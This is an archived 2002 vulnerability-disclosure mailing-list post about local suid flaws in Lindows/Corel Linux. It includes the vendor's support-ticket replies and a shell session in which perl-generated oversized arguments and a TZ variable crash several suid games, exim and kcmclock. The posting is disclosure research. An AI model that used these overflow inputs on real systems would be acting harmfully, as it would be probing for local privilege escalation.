Re: Lindows Issues

From: KF (dotslash@snosoft.com)
Date: 07/18/02


Date: Thu, 18 Jul 2002 10:55:54 -0400
From: KF <dotslash@snosoft.com>
To: sec daddy <secdaddyb@yahoo.com>, vuln-dev@security-focus.com

Yes... we found about 7 or 8 suids to be exploitable in the default
config (local only so not any real threat... I don't believe it's supposed
to be multi-user really)... they were reported to Lindows.com. Lindows
is based on Xandros Linux so you may find that auditing Xandros will
reveal a lot about Lindows. They (Lindows) SUCK on security type
responses is all I know ... they NEVER really got back to me. They
marked my case as "Solved" after they replied "we will get back with you
shortly" for the 2nd time.

* Response (Evan) * 06/17/2002 10:15 AM
Thank you for the email. We are working on this and will get back with
you shortly.
* Customer (Kevin Finisterre) * 06/17/2002 10:15 AM
I forwarded several security issues on to your staff and only received
one reply... what is the status of these issues?
* Question Reference #020526-000013 *

-KF
 
* Question Reference #020617-000051*
*Contact Information: * dotslash@snosoft.com
*Date Created: * 06/17/2002 10:15 AM
*Last Updated: * 06/24/2002 04:08 PM
*Status: * Solved

elguapo25:/home/elguapo# uname -a
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT 2000 i686 unknown

elguapo25:/home/elguapo# cat /etc/issue
Corel LINUX 1.2 (\l)

elguapo25:/home/elguapo# cat /etc/motd
Linux elguapo25 2.2.16 #1 Tue Jul 18 16:07:55 EDT 2000 i686 unknown

Copyright (C) 1993-1999 Software in the Public Interest, and others

Most of the programs included with the Debian GNU/Linux system are
freely redistributable; the exact distribution terms for each program
are described in the individual files in /usr/doc/ */copyright

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

elguapo25:~# /usr/games/xsok -xsokdir `perl -e 'print "A" x 9000'`
Segmentation fault

elguapo25:~# /usr/games/purity `perl -e 'print "A" x 9000'`
Segmentation fault

elguapo25:~# /usr/games/xgalaga -level `perl -e 'print "1" x 9000'`
xgal.sndsrv: Couldn't open DSP /dev/dsp
xgal.sndsrv: Sound not available
Segmentation fault

elguapo25:~# /usr/games/xpat2 -xpmdir `perl -e 'print "A" x 9000'`
FAILED to open keyboard file "/usr/lib/games/xpat/C/keys"
Segmentation fault

elguapo25:~# /usr/sbin/exim -C `perl -e 'print "A" x 9000'`
Segmentation fault

elguapo25:~# export TZ=`perl -e 'print "A" x 9000'`
elguapo25:~# /usr/X11R6/bin/kcmclock
Segmentation fault

-KF

sec daddy wrote:

>Has anyone done research on the security of Lindows?
>There appear to be application level exploits with MS
>programs that run on Lindows, consistent with Windows.
> I'm more curious about O/S level exploits.
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Autos - Get free new car price quotes
>http://autos.yahoo.com
>
>
